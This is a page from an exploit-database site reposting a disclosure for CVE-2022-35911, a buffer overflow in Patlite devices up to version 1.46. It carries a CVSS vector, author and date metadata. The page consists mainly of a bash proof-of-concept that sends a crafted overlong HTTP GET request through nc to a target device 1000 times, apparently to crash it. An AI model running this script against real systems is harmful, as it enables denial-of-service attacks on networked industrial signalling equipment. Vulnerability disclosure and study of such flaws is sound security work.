Advertisement






Patlite 1.46 Buffer Overflow

CVE Category Price Severity
CVE-2022-35911 CWE-119 $500 High
Author Risk Exploitation Type Date
John Doe High Remote 2022-07-25
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022070068

Below is a copy:

Patlite 1.46 Buffer Overflow
# Exploit Title: CVE-2022-35911 - Patlite Overflow.
# Date: 2022-07-07
# Exploit Author: Samy Younsi - Necrum Security Labs
# Vendor Homepage: https://www.patlite.co.jp
# Software Link: https://www.patlite.co.jp/product/detail0000021462.html
# Version: Versions 1.46 and bellow are affected
# Tested on: CentOs & Ubuntu
# CVE : CVE-2022-35911


#!/bin/bash

IP="192.168.1.101"
PORT="80"

for i in {0..1000}; 
do 
  echo "[$i]: "; 
  echo -ne "GET /api/control/AAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHost: $IP\r\n\r\n" | nc $IP $PORT; 
done > /dev/null 2>&1

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.